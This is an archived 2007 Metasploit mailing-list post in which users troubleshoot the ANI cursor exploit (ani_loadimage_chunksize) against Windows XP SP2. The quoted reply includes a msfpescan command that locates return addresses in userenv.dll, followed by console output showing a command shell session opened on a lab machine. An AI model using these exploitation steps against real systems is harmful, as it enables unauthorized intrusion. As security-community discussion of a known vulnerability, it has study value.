Metasploit mailing list archives

Metasploit vs ANI


From: security at vahle.de (security)
Date: Thu, 05 Apr 2007 09:10:09 +0200

well i tried same , patched exploit using addresses gained from userenv.dll
0x7665c81a
0x766978ab

but without any effect still no success .

Thomas
Fabrice MOURRON schrieb:
Hi,

On my french XP SP2 :

msfpescan -f C:\WINDOWS\system32\userenv.dll -r "\xFF\x53\x04"
[C:\WINDOWS\system32\userenv.dll]
0x7699c81A    ff5304
0x769d78ab    ff5304

The first result works fine for me ;-)

msf exploit(ani_loadimage_chunksize) >
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.0.2:4444 -> 192.168.0.4:1302)

msf exploit(ani_loadimage_chunksize) > sessions -l

Active sessions
===============

  Id  Description    Tunnel
  --  -----------    ------
  1   Command shell  192.168.0.2:4444 -> 192.168.0.4:1302

msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\fmourron\Bureau>


@+

Fab







Current thread: